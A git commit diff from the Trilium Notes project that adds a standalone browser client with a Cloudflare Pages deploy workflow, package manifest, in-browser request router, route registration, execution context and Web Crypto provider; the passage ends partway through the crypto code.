feat(standalone/setup): improve layout & design of sync in progress

This reverts commit b19bf62d7e.

.github/workflows/deploy-app.yml

@@ -0,0 +1,67 @@
+name: Deploy Standalone App
+
+on:
+  # Trigger on push to main branch
+  push:
+    branches:
+      - standalone
+    # Only run when app files change
+    paths:
+      - 'apps/client/**'
+      - 'apps/client-standalone/**'
+      - 'packages/trilium-core/**'
+      - '.github/workflows/deploy-app.yml'
+
+  # Allow manual triggering from Actions tab
+  workflow_dispatch:
+
+  # Run on pull requests for preview deployments
+  pull_request:
+    paths:
+      - 'apps/client/**'
+      - 'apps/client-standalone/**'
+      - 'packages/trilium-core/**'
+      - '.github/workflows/deploy-app.yml'
+jobs:
+  build-and-deploy:
+    name: Build and Deploy App
+    runs-on: ubuntu-latest
+    timeout-minutes: 10
+
+    # Required permissions for deployment
+    permissions:
+      contents: read
+      deployments: write
+      pull-requests: write # For PR preview comments
+      id-token: write # For OIDC authentication (if needed)
+
+    steps:
+      - name: Checkout Repository
+        uses: actions/checkout@v6
+
+      - name: Setup pnpm
+        uses: pnpm/action-setup@v4
+
+      - name: Setup Node.js
+        uses: actions/setup-node@v6
+        with:
+          node-version: '24'
+          cache: 'pnpm'
+
+      - name: Install Dependencies
+        run: pnpm install --frozen-lockfile
+
+      - name: Trigger build of app
+        run: pnpm --filter=client-standalone build
+
+      - name: Deploy
+        uses: ./.github/actions/deploy-to-cloudflare-pages
+        if: github.repository == vars.REPO_MAIN
+        with:
+          project_name: "trilium-app"
+          comment_body: "🖥️ App preview is ready"
+          production_url: "https://app.triliumnotes.org"
+          deploy_dir: "apps/client-standalone/dist"
+          cloudflare_api_token: ${{ secrets.CLOUDFLARE_API_TOKEN }}
+          cloudflare_account_id: ${{ secrets.CLOUDFLARE_ACCOUNT_ID }}
+          github_token: ${{ secrets.GITHUB_TOKEN }}

.github/workflows/dev.yml

@@ -1,9 +1,9 @@
 name: Dev
 on:
   push:
-    branches: [ main ]
+    branches: [ main, standalone ]
   pull_request:
-    branches: [ main ]
+    branches: [ main, standalone ]
 
 concurrency:
   group: ${{ github.workflow }}-${{ github.ref }}

.gitignore

@@ -51,3 +51,6 @@ upload
 site/
 apps/*/coverage
 scripts/translation/.language*.json
+
+# AI
+.claude/settings.local.json

apps/client-standalone/.env

@@ -0,0 +1,4 @@
+# The development license key for premium CKEditor features.
+# Note: This key must only be used for the Trilium Notes project.
+VITE_CKEDITOR_KEY=eyJhbGciOiJFUzI1NiJ9.eyJleHAiOjE3ODcyNzA0MDAsImp0aSI6IjkyMWE1MWNlLTliNDMtNGRlMC1iOTQwLTc5ZjM2MDBkYjg1NyIsImRpc3RyaWJ1dGlvbkNoYW5uZWwiOiJ0cmlsaXVtIiwiZmVhdHVyZXMiOlsiVFJJTElVTSJdLCJ2YyI6ImU4YzRhMjBkIn0.hny77p-U4-jTkoqbwPytrEar5ylGCWBN7Ez3SlB8i6_mJCBIeCSTOlVQk_JMiOEq3AGykUMHzWXzjdMFwgniOw
+VITE_CKEDITOR_ENABLE_INSPECTOR=false

apps/client-standalone/.env.production

@@ -0,0 +1 @@
+VITE_CKEDITOR_ENABLE_INSPECTOR=false

apps/client-standalone/package.json

@@ -0,0 +1,87 @@
+{
+  "name": "@triliumnext/client-standalone",
+  "version": "0.102.1",
+  "description": "Standalone client for TriliumNext with SQLite WASM backend",
+  "private": true,
+  "license": "AGPL-3.0-only",
+  "scripts": {
+    "build": "cross-env NODE_OPTIONS=--max-old-space-size=4096 vite build",
+    "dev": "vite dev",
+    "test": "vitest",
+    "start-prod": "pnpm build && pnpm http-server dist -p 8888",
+    "coverage": "vitest --coverage"
+  },
+  "dependencies": {
+    "@excalidraw/excalidraw": "0.18.0",
+    "@fullcalendar/core": "6.1.20",
+    "@fullcalendar/daygrid": "6.1.20",
+    "@fullcalendar/interaction": "6.1.20",
+    "@fullcalendar/list": "6.1.20",
+    "@fullcalendar/multimonth": "6.1.20",
+    "@fullcalendar/timegrid": "6.1.20",
+    "@maplibre/maplibre-gl-leaflet": "0.1.3",
+    "@mermaid-js/layout-elk": "0.2.0",
+    "@mind-elixir/node-menu": "5.0.1",
+    "@popperjs/core": "2.11.8",
+    "@preact/signals": "2.5.1",
+    "@sqlite.org/sqlite-wasm": "3.51.1-build2",
+    "@triliumnext/ckeditor5": "workspace:*",
+    "@triliumnext/codemirror": "workspace:*",
+    "@triliumnext/commons": "workspace:*",
+    "@triliumnext/core": "workspace:*",
+    "@triliumnext/highlightjs": "workspace:*",
+    "@triliumnext/share-theme": "workspace:*",
+    "@triliumnext/split.js": "workspace:*",
+    "@zumer/snapdom": "2.0.1",
+    "autocomplete.js": "0.38.1",
+    "bootstrap": "5.3.8",
+    "boxicons": "2.1.4",
+    "clsx": "2.1.1",
+    "color": "5.0.3",
+    "debounce": "3.0.0",
+    "draggabilly": "3.0.0",
+    "force-graph": "1.51.0",
+    "globals": "17.0.0",
+    "i18next": "25.7.3",
+    "i18next-http-backend": "3.0.2",
+    "jquery": "3.7.1",
+    "jquery.fancytree": "2.38.5",
+    "js-sha1": "0.7.0",
+    "js-sha256": "0.11.1",
+    "js-sha512": "0.9.0",
+    "jsplumb": "2.15.6",
+    "katex": "0.16.27",
+    "knockout": "3.5.1",
+    "leaflet": "1.9.4",
+    "leaflet-gpx": "2.2.0",
+    "mark.js": "8.11.1",
+    "marked": "17.0.1",
+    "mermaid": "11.12.2",
+    "mind-elixir": "5.4.0",
+    "normalize.css": "8.0.1",
+    "panzoom": "9.4.3",
+    "preact": "10.28.2",
+    "react-i18next": "16.5.1",
+    "react-window": "2.2.3",
+    "reveal.js": "5.2.1",
+    "svg-pan-zoom": "3.6.2",
+    "tabulator-tables": "6.3.1",
+    "vanilla-js-wheel-zoom": "9.0.4"
+  },
+  "devDependencies": {
+    "@ckeditor/ckeditor5-inspector": "5.0.0",
+    "@preact/preset-vite": "2.10.2",
+    "@types/bootstrap": "5.2.10",
+    "@types/jquery": "3.5.33",
+    "@types/leaflet": "1.9.21",
+    "@types/leaflet-gpx": "1.3.8",
+    "@types/mark.js": "8.11.12",
+    "@types/reveal.js": "5.2.2",
+    "@types/tabulator-tables": "6.3.1",
+    "copy-webpack-plugin": "13.0.1",
+    "cross-env": "7.0.3",
+    "happy-dom": "20.0.11",
+    "script-loader": "0.7.2",
+    "vite-plugin-static-copy": "3.1.4"
+  }
+}

apps/client-standalone/public/_headers

@@ -0,0 +1,3 @@
+/*
+  Cross-Origin-Opener-Policy: same-origin
+  Cross-Origin-Embedder-Policy: require-corp

apps/client-standalone/public/manifest.webmanifest

@@ -0,0 +1,20 @@
+{
+    "name": "Trilium Notes",
+    "short_name": "Trilium",
+    "description": "Trilium Notes is a hierarchical note taking application with focus on building large personal knowledge bases.",
+    "theme_color": "#333333",
+    "background_color": "#1F1F1F",
+    "display": "standalone",
+    "scope": "/",
+    "start_url": "/",
+    "display_override": [
+        "window-controls-overlay"
+    ],
+    "icons": [
+        {
+            "src": "assets/icon.png",
+            "sizes": "512x512",
+            "type": "image/png"
+        }
+    ]
+}

apps/client-standalone/src/desktop.ts

@@ -0,0 +1,2 @@
+// Re-export desktop from client
+export * from "../../client/src/desktop";

apps/client-standalone/src/index.html

@@ -0,0 +1,31 @@
+<!DOCTYPE html>
+<html lang="en">
+    <head>
+        <meta charset="utf-8">
+        <link rel="shortcut icon" href="favicon.ico">
+        <meta name="mobile-web-app-capable" content="yes">
+        <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent" />
+        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, viewport-fit=cover" />
+        <link rel="manifest" crossorigin="use-credentials" href="manifest.webmanifest">
+        <title>Trilium Notes</title>
+    </head>
+
+    <body id="trilium-app">
+        <noscript>Trilium requires JavaScript to be enabled.</noscript>
+
+        <div id="context-menu-cover"></div>
+        <div class="dropdown-menu dropdown-menu-sm" id="context-menu-container" style="display: none"></div>
+
+        <!-- Required for match the PWA's top bar color with the theme -->
+        <!-- This works even when the user directly changes --root-background in CSS -->
+        <div id="background-color-tracker" style="position: absolute; visibility: hidden; color: var(--root-background); transition: color 1ms;"></div>
+
+        <!-- Bootstrap (request server for required information) -->
+        <script src="./main.ts" type="module"></script>
+
+        <!-- Required for correct loading of scripts in Electron -->
+        <script>
+            if (typeof module === 'object') {window.module = module; module = undefined;}
+        </script>
+    </body>
+</html>

apps/client-standalone/src/lightweight/browser_router.ts

@@ -0,0 +1,283 @@
+/**
+ * Browser-compatible router that mimics Express routing patterns.
+ * Supports path parameters (e.g., /api/notes/:noteId) and query strings.
+ */
+
+import { getContext, routes } from "@triliumnext/core";
+
+export interface BrowserRequest {
+    method: string;
+    url: string;
+    path: string;
+    params: Record<string, string>;
+    query: Record<string, string | undefined>;
+    headers?: Record<string, string>;
+    body?: unknown;
+}
+
+export interface BrowserResponse {
+    status: number;
+    headers: Record<string, string>;
+    body: ArrayBuffer | null;
+}
+
+export type RouteHandler = (req: BrowserRequest) => unknown | Promise<unknown>;
+
+interface Route {
+    method: string;
+    pattern: RegExp;
+    paramNames: string[];
+    handler: RouteHandler;
+}
+
+/**
+ * Symbol used to mark a result as an already-formatted response,
+ * so that formatResult passes it through without JSON-serializing.
+ * Must match the symbol exported from browser_routes.ts.
+ */
+const RAW_RESPONSE = Symbol.for('RAW_RESPONSE');
+
+const encoder = new TextEncoder();
+
+/**
+ * Convert an Express-style path pattern to a RegExp.
+ * Supports :param syntax for path parameters.
+ *
+ * Examples:
+ *   /api/notes/:noteId -> /^\/api\/notes\/([^\/]+)$/
+ *   /api/notes/:noteId/revisions -> /^\/api\/notes\/([^\/]+)\/revisions$/
+ */
+function pathToRegex(path: string): { pattern: RegExp; paramNames: string[] } {
+    const paramNames: string[] = [];
+
+    // Escape special regex characters except for :param patterns
+    const regexPattern = path
+        .replace(/[.*+?^${}()|[\]\\]/g, '\\$&') // Escape special chars
+        .replace(/:([a-zA-Z_][a-zA-Z0-9_]*)/g, (_, paramName) => {
+            paramNames.push(paramName);
+            return '([^/]+)';
+        });
+
+    return {
+        pattern: new RegExp(`^${regexPattern}$`),
+        paramNames
+    };
+}
+
+/**
+ * Parse query string into an object.
+ */
+function parseQuery(search: string): Record<string, string | undefined> {
+    const query: Record<string, string | undefined> = {};
+    if (!search || search === '?') return query;
+
+    const params = new URLSearchParams(search);
+    for (const [key, value] of params) {
+        query[key] = value;
+    }
+    return query;
+}
+
+/**
+ * Convert a result to a JSON response.
+ */
+function jsonResponse(obj: unknown, status = 200, extraHeaders: Record<string, string> = {}): BrowserResponse {
+    const parsedObj = routes.convertEntitiesToPojo(obj);
+    const body = encoder.encode(JSON.stringify(parsedObj)).buffer as ArrayBuffer;
+    return {
+        status,
+        headers: { "content-type": "application/json; charset=utf-8", ...extraHeaders },
+        body
+    };
+}
+
+/**
+ * Convert a string to a text response.
+ */
+function textResponse(text: string, status = 200, extraHeaders: Record<string, string> = {}): BrowserResponse {
+    const body = encoder.encode(text).buffer as ArrayBuffer;
+    return {
+        status,
+        headers: { "content-type": "text/plain; charset=utf-8", ...extraHeaders },
+        body
+    };
+}
+
+/**
+ * Browser router class that handles route registration and dispatching.
+ */
+export class BrowserRouter {
+    private routes: Route[] = [];
+
+    /**
+     * Register a route handler.
+     */
+    register(method: string, path: string, handler: RouteHandler): void {
+        const { pattern, paramNames } = pathToRegex(path);
+        this.routes.push({
+            method: method.toUpperCase(),
+            pattern,
+            paramNames,
+            handler
+        });
+    }
+
+    /**
+     * Convenience methods for common HTTP methods.
+     */
+    get(path: string, handler: RouteHandler): void {
+        this.register('GET', path, handler);
+    }
+
+    post(path: string, handler: RouteHandler): void {
+        this.register('POST', path, handler);
+    }
+
+    put(path: string, handler: RouteHandler): void {
+        this.register('PUT', path, handler);
+    }
+
+    patch(path: string, handler: RouteHandler): void {
+        this.register('PATCH', path, handler);
+    }
+
+    delete(path: string, handler: RouteHandler): void {
+        this.register('DELETE', path, handler);
+    }
+
+    /**
+     * Dispatch a request to the appropriate handler.
+     */
+    async dispatch(method: string, urlString: string, body?: unknown, headers?: Record<string, string>): Promise<BrowserResponse> {
+        const url = new URL(urlString);
+        const path = url.pathname;
+        const query = parseQuery(url.search);
+        const upperMethod = method.toUpperCase();
+
+        // Parse JSON body if it's an ArrayBuffer and content-type suggests JSON
+        let parsedBody = body;
+        if (body instanceof ArrayBuffer && headers) {
+            const contentType = headers['content-type'] || headers['Content-Type'] || '';
+            if (contentType.includes('application/json')) {
+                try {
+                    const text = new TextDecoder().decode(body);
+                    if (text.trim()) {
+                        parsedBody = JSON.parse(text);
+                    }
+                } catch (e) {
+                    console.warn('[Router] Failed to parse JSON body:', e);
+                    // Keep original body if JSON parsing fails
+                    parsedBody = body;
+                }
+            }
+        }
+        // Find matching route
+        for (const route of this.routes) {
+            if (route.method !== upperMethod) continue;
+
+            const match = path.match(route.pattern);
+            if (!match) continue;
+
+            // Extract path parameters
+            const params: Record<string, string> = {};
+            for (let i = 0; i < route.paramNames.length; i++) {
+                params[route.paramNames[i]] = decodeURIComponent(match[i + 1]);
+            }
+
+            const request: BrowserRequest = {
+                method: upperMethod,
+                url: urlString,
+                path,
+                params,
+                query,
+                headers: headers ?? {},
+                body: parsedBody
+            };
+
+            try {
+                const result = await getContext().init(async () => await route.handler(request));
+                return this.formatResult(result);
+            } catch (error) {
+                return this.formatError(error, `Error handling ${method} ${path}`);
+            }
+        }
+
+        // No route matched
+        return textResponse(`Not found: ${method} ${path}`, 404);
+    }
+
+    /**
+     * Format a handler result into a response.
+     * Follows the same patterns as the server's apiResultHandler.
+     */
+    private formatResult(result: unknown): BrowserResponse {
+        // Handle raw responses (e.g. from image routes that write directly to res)
+        if (result && typeof result === 'object' && RAW_RESPONSE in result) {
+            const raw = result as unknown as { status: number; headers: Record<string, string>; body: unknown };
+            let body: ArrayBuffer | null = null;
+
+            if (raw.body instanceof ArrayBuffer) {
+                body = raw.body;
+            } else if (raw.body instanceof Uint8Array) {
+                body = raw.body.buffer as ArrayBuffer;
+            } else if (typeof raw.body === 'string') {
+                body = encoder.encode(raw.body).buffer as ArrayBuffer;
+            }
+
+            return {
+                status: raw.status,
+                headers: raw.headers,
+                body
+            };
+        }
+
+        // Handle [statusCode, response] format
+        if (Array.isArray(result) && result.length > 0 && Number.isInteger(result[0])) {
+            const [statusCode, response] = result;
+            return jsonResponse(response, statusCode);
+        }
+
+        // Handle undefined (no content) - 204 should have no body
+        if (result === undefined) {
+            return {
+                status: 204,
+                headers: {},
+                body: null
+            };
+        }
+
+        // Default: JSON response with 200
+        return jsonResponse(result, 200);
+    }
+
+    /**
+     * Format an error into a response.
+     */
+    private formatError(error: unknown, context: string): BrowserResponse {
+        console.error('[Router] Handler error:', context, error);
+
+        // Check for known error types
+        if (error && typeof error === 'object') {
+            const err = error as { constructor?: { name?: string }; message?: string };
+
+            if (err.constructor?.name === 'NotFoundError') {
+                return jsonResponse({ message: err.message || 'Not found' }, 404);
+            }
+
+            if (err.constructor?.name === 'ValidationError') {
+                return jsonResponse({ message: err.message || 'Validation error' }, 400);
+            }
+        }
+
+        // Generic error
+        const message = error instanceof Error ? error.message : String(error);
+        return jsonResponse({ message }, 500);
+    }
+}
+
+/**
+ * Create a new router instance.
+ */
+export function createRouter(): BrowserRouter {
+    return new BrowserRouter();
+}

apps/client-standalone/src/lightweight/browser_routes.ts

@@ -0,0 +1,289 @@
+/**
+ * Browser route definitions.
+ * This integrates with the shared route builder from @triliumnext/core.
+ */
+
+import { BootstrapDefinition } from '@triliumnext/commons';
+import { entity_changes, getContext, getSharedBootstrapItems, getSql, routes, sql_init } from '@triliumnext/core';
+
+import packageJson from '../../package.json' with { type: 'json' };
+import { type BrowserRequest, BrowserRouter } from './browser_router';
+
+/** Minimal response object used by apiResultHandler to capture the processed result. */
+interface ResultHandlerResponse {
+    headers: Record<string, string>;
+    result: unknown;
+    setHeader(name: string, value: string): void;
+}
+
+/**
+ * Symbol used to mark a result as an already-formatted BrowserResponse,
+ * so that BrowserRouter.formatResult passes it through without JSON-serializing.
+ * Uses Symbol.for() so the same symbol is shared across modules.
+ */
+const RAW_RESPONSE = Symbol.for('RAW_RESPONSE');
+
+type HttpMethod = 'get' | 'post' | 'put' | 'patch' | 'delete';
+
+/**
+ * Creates an Express-like request object from a BrowserRequest.
+ */
+function toExpressLikeReq(req: BrowserRequest) {
+    return {
+        params: req.params,
+        query: req.query,
+        body: req.body,
+        headers: req.headers ?? {},
+        method: req.method,
+        get originalUrl() { return req.url; }
+    };
+}
+
+/**
+ * Extracts context headers from the request and sets them in the execution context,
+ * mirroring what the server does in route_api.ts.
+ */
+function setContextFromHeaders(req: BrowserRequest) {
+    const headers = req.headers ?? {};
+    const ctx = getContext();
+    ctx.set("componentId", headers["trilium-component-id"]);
+    ctx.set("localNowDateTime", headers["trilium-local-now-datetime"]);
+    ctx.set("hoistedNoteId", headers["trilium-hoisted-note-id"] || "root");
+}
+
+/**
+ * Wraps a core route handler to work with the BrowserRouter.
+ * Core handlers expect an Express-like request object with params, query, and body.
+ * Each request is wrapped in an execution context (like cls.init() on the server)
+ * to ensure entity change tracking works correctly.
+ */
+function wrapHandler(handler: (req: any) => unknown, transactional: boolean) {
+    return (req: BrowserRequest) => {
+        return getContext().init(() => {
+            setContextFromHeaders(req);
+            const expressLikeReq = toExpressLikeReq(req);
+            if (transactional) {
+                return getSql().transactional(() => handler(expressLikeReq));
+            }
+            return handler(expressLikeReq);
+        });
+    };
+}
+
+/**
+ * Creates an apiRoute function compatible with buildSharedApiRoutes.
+ * This bridges the core's route registration to the BrowserRouter.
+ */
+function createApiRoute(router: BrowserRouter, transactional: boolean) {
+    return (method: HttpMethod, path: string, handler: (req: any) => unknown) => {
+        router.register(method, path, wrapHandler(handler, transactional));
+    };
+}
+
+/**
+ * Low-level route registration matching the server's `route()` signature:
+ *   route(method, path, middleware[], handler, resultHandler)
+ *
+ * In standalone mode:
+ * - Middleware (e.g. checkApiAuth) is skipped — there's no authentication.
+ * - The resultHandler is applied to post-process the result (entity conversion, status codes).
+ */
+function createRoute(router: BrowserRouter) {
+    return (method: HttpMethod, path: string, _middleware: any[], handler: (req: any, res: any) => unknown, resultHandler?: ((req: any, res: any, result: unknown) => unknown) | null) => {
+        router.register(method, path, (req: BrowserRequest) => {
+            return getContext().init(() => {
+                setContextFromHeaders(req);
+                const expressLikeReq = toExpressLikeReq(req);
+                const mockRes = createMockExpressResponse();
+                const result = getSql().transactional(() => handler(expressLikeReq, mockRes));
+
+                // If the handler used the mock response (e.g. image routes that call res.send()),
+                // return it as a raw response so BrowserRouter doesn't JSON-serialize it.
+                if (mockRes._used) {
+                    return {
+                        [RAW_RESPONSE]: true as const,
+                        status: mockRes._status,
+                        headers: mockRes._headers,
+                        body: mockRes._body
+                    };
+                }
+
+                if (resultHandler) {
+                    // Create a minimal response object that captures what apiResultHandler sets.
+                    const res = createResultHandlerResponse();
+                    resultHandler(expressLikeReq, res, result);
+                    return res.result;
+                }
+
+                return result;
+            });
+        });
+    };
+}
+
+/**
+ * Creates a mock Express response object that captures calls to set(), send(), sendStatus(), etc.
+ * Used for route handlers (like image routes) that write directly to the response.
+ */
+function createMockExpressResponse() {
+    const res = {
+        _used: false,
+        _status: 200,
+        _headers: {} as Record<string, string>,
+        _body: null as unknown,
+        set(name: string, value: string) {
+            res._headers[name] = value;
+            return res;
+        },
+        setHeader(name: string, value: string) {
+            res._headers[name] = value;
+            return res;
+        },
+        status(code: number) {
+            res._status = code;
+            return res;
+        },
+        send(body: unknown) {
+            res._used = true;
+            res._body = body;
+            return res;
+        },
+        sendStatus(code: number) {
+            res._used = true;
+            res._status = code;
+            return res;
+        }
+    };
+    return res;
+}
+
+/**
+ * Standalone apiResultHandler matching the server's behavior:
+ * - Converts Becca entities to POJOs
+ * - Handles [statusCode, response] tuple format
+ * - Sets trilium-max-entity-change-id (captured in response headers)
+ */
+function apiResultHandler(_req: any, res: ResultHandlerResponse, result: unknown) {
+    res.headers["trilium-max-entity-change-id"] = String(entity_changes.getMaxEntityChangeId());
+    result = routes.convertEntitiesToPojo(result);
+
+    if (Array.isArray(result) && result.length > 0 && Number.isInteger(result[0])) {
+        const [_statusCode, response] = result;
+        res.result = response;
+    } else if (result === undefined) {
+        res.result = "";
+    } else {
+        res.result = result;
+    }
+}
+
+/**
+ * No-op middleware stubs for standalone mode.
+ *
+ * In a browser context there is no network authentication, rate limiting,
+ * or multi-user access, so all auth/rate-limit middleware is a no-op.
+ *
+ * `checkAppNotInitialized` still guards setup routes: if the database is
+ * already initialised the middleware throws so the route handler is never
+ * reached (mirrors the server behaviour).
+ */
+function noopMiddleware() {
+    // No-op.
+}
+
+function checkAppNotInitialized() {
+    if (sql_init.isDbInitialized()) {
+        throw new Error("App already initialized.");
+    }
+}
+
+/**
+ * Creates a minimal response-like object for the apiResultHandler.
+ */
+function createResultHandlerResponse(): ResultHandlerResponse {
+    return {
+        headers: {},
+        result: undefined,
+        setHeader(name: string, value: string) {
+            this.headers[name] = value;
+        }
+    };
+}
+
+/**
+ * Register all API routes on the browser router using the shared builder.
+ *
+ * @param router - The browser router instance
+ */
+export function registerRoutes(router: BrowserRouter): void {
+    const apiRoute = createApiRoute(router, true);
+    routes.buildSharedApiRoutes({
+        route: createRoute(router),
+        asyncRoute: createRoute(router),
+        apiRoute,
+        asyncApiRoute: createApiRoute(router, false),
+        apiResultHandler,
+        checkApiAuth: noopMiddleware,
+        checkApiAuthOrElectron: noopMiddleware,
+        checkAppNotInitialized,
+        checkCredentials: noopMiddleware,
+        loginRateLimiter: noopMiddleware
+    });
+    apiRoute('get', '/bootstrap', bootstrapRoute);
+
+    // Dummy routes for compatibility.
+    apiRoute("get", "/api/script/widgets", () => []);
+    apiRoute("get", "/api/script/startup", () => []);
+    apiRoute("get", "/api/system-checks", () => ({ isCpuArchMismatch: false }));
+}
+
+function bootstrapRoute(): BootstrapDefinition {
+    const assetPath = ".";
+
+    const isDbInitialized = sql_init.isDbInitialized();
+    const commonItems = getSharedBootstrapItems(assetPath, isDbInitialized);
+
+    if (!isDbInitialized) {
+        return {
+            ...commonItems,
+            isStandalone: true,
+            baseApiUrl: "../api/",
+        };
+    }
+
+    return {
+        ...commonItems,
+        appPath: assetPath,
+        device: false, // Let the client detect device type.
+        csrfToken: "dummy-csrf-token",
+        themeCssUrl: false,
+        themeUseNextAsBase: "next",
+        triliumVersion: packageJson.version,
+        baseApiUrl: "../api/",
+        headingStyle: "plain",
+        layoutOrientation: "vertical",
+        platform: "web",
+        isDev: import.meta.env.DEV,
+        isMainWindow: true,
+        isElectron: false,
+        isStandalone: true,
+        hasNativeTitleBar: false,
+        hasBackgroundEffects: false,
+
+        // TODO: Fill properly
+        currentLocale: { id: "en", name: "English", rtl: false },
+        isRtl: false,
+        instanceName: null,
+        appCssNoteIds: [],
+        TRILIUM_SAFE_MODE: false
+    };
+}
+
+/**
+ * Create and configure a router with all routes registered.
+ */
+export function createConfiguredRouter(): BrowserRouter {
+    const router = new BrowserRouter();
+    registerRoutes(router);
+    return router;
+}

apps/client-standalone/src/lightweight/cls_provider.ts

@@ -0,0 +1,77 @@
+import { ExecutionContext } from "@triliumnext/core";
+
+/**
+ * Browser execution context implementation.
+ * 
+ * Handles per-request context isolation with support for fire-and-forget async operations
+ * using a context stack and grace-period cleanup to allow unawaited promises to complete.
+ */
+export default class BrowserExecutionContext implements ExecutionContext {
+    private contextStack: Map<string, any>[] = [];
+    private cleanupTimers = new WeakMap<Map<string, any>, ReturnType<typeof setTimeout>>();
+    private readonly CLEANUP_GRACE_PERIOD = 1000; // 1 second for fire-and-forget operations
+
+    private getCurrentContext(): Map<string, any> {
+        if (this.contextStack.length === 0) {
+            throw new Error("ExecutionContext not initialized");
+        }
+        return this.contextStack[this.contextStack.length - 1];
+    }
+
+    get<T = any>(key: string): T {
+        return this.getCurrentContext().get(key);
+    }
+
+    set(key: string, value: any): void {
+        this.getCurrentContext().set(key, value);
+    }
+
+    reset(): void {
+        this.contextStack = [];
+    }
+
+    init<T>(callback: () => T): T {
+        const context = new Map<string, any>();
+        this.contextStack.push(context);
+
+        // Cancel any pending cleanup timer for this context
+        const existingTimer = this.cleanupTimers.get(context);
+        if (existingTimer) {
+            clearTimeout(existingTimer);
+            this.cleanupTimers.delete(context);
+        }
+
+        try {
+            const result = callback();
+
+            // If the result is a Promise
+            if (result && typeof result === 'object' && 'then' in result && 'catch' in result) {
+                const promise = result as unknown as Promise<any>;
+                return promise.finally(() => {
+                    this.scheduleContextCleanup(context);
+                }) as T;
+            } else {
+                // For synchronous results, schedule delayed cleanup to allow fire-and-forget operations
+                this.scheduleContextCleanup(context);
+                return result;
+            }
+        } catch (error) {
+            // Always clean up on error with grace period
+            this.scheduleContextCleanup(context);
+            throw error;
+        }
+    }
+
+    private scheduleContextCleanup(context: Map<string, any>): void {
+        const timer = setTimeout(() => {
+            // Remove from stack if still present
+            const index = this.contextStack.indexOf(context);
+            if (index !== -1) {
+                this.contextStack.splice(index, 1);
+            }
+            this.cleanupTimers.delete(context);
+        }, this.CLEANUP_GRACE_PERIOD);
+
+        this.cleanupTimers.set(context, timer);
+    }
+}

apps/client-standalone/src/lightweight/crypto_provider.ts

@@ -0,0 +1,158 @@
+import type { CryptoProvider } from "@triliumnext/core";
+import { sha1 } from "js-sha1";
+import { sha256 } from "js-sha256";
+import { sha512 } from "js-sha512";
+
+interface Cipher {
+    update(data: Uint8Array): Uint8Array;
+    final(): Uint8Array;
+}
+
+const CHARS = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
+
+/**
+ * Crypto provider for browser environments using the Web Crypto API.
+ */
+export default class BrowserCryptoProvider implements CryptoProvider {
+
+    createHash(algorithm: "sha1" | "sha512", content: string | Uint8Array): Uint8Array {
+        const data = typeof content === "string" ? content :
+                new TextDecoder().decode(content);
+
+        const hexHash = algorithm === "sha1" ? sha1(data) : sha512(data);
+
+        // Convert hex string to Uint8Array
+        const bytes = new Uint8Array(hexHash.length / 2);
+        for (let i = 0; i < hexHash.length; i += 2) {
+            bytes[i / 2] = parseInt(hexHash.substr(i, 2), 16);
+        }
+        return bytes;
+    }
+
+    createCipheriv(algorithm: "aes-128-cbc", key: Uint8Array, iv: Uint8Array): Cipher {
+        // Web Crypto API doesn't support streaming cipher like Node.js
+        // We need to implement a wrapper that collects data and encrypts on final()
+        return new WebCryptoCipher(algorithm, key, iv, "encrypt");
+    }
+
+    createDecipheriv(algorithm: "aes-128-cbc", key: Uint8Array, iv: Uint8Array): Cipher {
+        return new WebCryptoCipher(algorithm, key, iv, "decrypt");
+    }
+
+    randomBytes(size: number): Uint8Array {
+        const bytes = new Uint8Array(size);
+        crypto.getRandomValues(bytes);
+        return bytes;
+    }
+
+    randomString(length: number): string {
+        const bytes = this.randomBytes(length);
+        let result = "";
+        for (let i = 0; i < length; i++) {
+            result += CHARS[bytes[i] % CHARS.length];
+        }
+        return result;
+    }
+
+    hmac(secret: string | Uint8Array, value: string | Uint8Array): string {
+        const secretStr = typeof secret === "string" ? secret : new TextDecoder().decode(secret);
+        const valueStr = typeof value === "string" ? value : new TextDecoder().decode(value);
+        // sha256.hmac returns hex, convert to base64 to match Node's behavior
+        const hexHash = sha256.hmac(secretStr, valueStr);
+        const bytes = new Uint8Array(hexHash.length / 2);
+        for (let i = 0; i < hexHash.length; i += 2) {
+            bytes[i / 2] = parseInt(hexHash.substr(i, 2), 16);
+        }
+        return btoa(String.fromCharCode(...bytes));
+    }
+}
+
+/**
+ * A cipher implementation that wraps Web Crypto API.
+ * Note: This buffers all data until final() is called, which differs from
+ * Node.js's streaming cipher behavior.
+ */
+class WebCryptoCipher implements Cipher {
+    private chunks: Uint8Array[] = [];
+    private algorithm: string;
+    private key: Uint8Array;
+    private iv: Uint8Array;
+    private mode: "encrypt" | "decrypt";
+    private finalized = false;
+
+    constructor(
+        algorithm: "aes-128-cbc",
+        key: Uint8Array,
+        iv: Uint8Array,
+        mode: "encrypt" | "decrypt"
+    ) {
+        this.algorithm = algorithm;
+        this.key = key;
+        this.iv = iv;
+        this.mode = mode;
+    }
+
+    update(data: Uint8Array): Uint8Array {
+        if (this.finalized) {
+            throw new Error("Cipher has already been finalized");
+        }
+        // Buffer the data - Web Crypto doesn't support streaming
+        this.chunks.push(data);
+        // Return empty array since we process everything in final()
+        return new Uint8Array(0);
+    }
+
+    final(): Uint8Array {
+        if (this.finalized) {
+            throw new Error("Cipher has already been finalized");
+        }
+        this.finalized = true;
+
+        // Web Crypto API is async, but we need sync behavior
+        // This is a fundamental limitation that requires architectural changes
+        // For now, throw an error directing users to use async methods
+        throw new Error(
+            "Synchronous cipher finalization not available in browser. " +
+            "The Web Crypto API is async-only. Use finalizeAsync() instead."
+        );
+    }
+
+    /**
+     * Async version that actually performs the encryption/decryption.
+     */
+    async finalizeAsync(): Promise<Uint8Array> {
+        if (this.finalized) {
+            throw new Error("Cipher has already been finalized");
+        }
+        this.finalized = true;
+
+        // Concatenate all chunks
+        const totalLength = this.chunks.reduce((sum, chunk) => sum + chunk.length, 0);
+        const data = new Uint8Array(totalLength);
+        let offset = 0;
+        for (const chunk of this.chunks) {
+            data.set(chunk, offset);
+            offset += chunk.length;
+        }
+
+        // Copy key and iv to ensure they're plain ArrayBuffer-backed
+        const keyBuffer = new Uint8Array(this.key);
+        const ivBuffer = new Uint8Array(this.iv);
+
+        // Import the key
+        const cryptoKey = await crypto.subtle.importKey(
+            "raw",
+            keyBuffer,
+            { name: "AES-CBC" },
+            false,
+            [this.mode]
+        );
+
+        // Perform encryption/decryption
+        const result = this.mode === "encrypt"
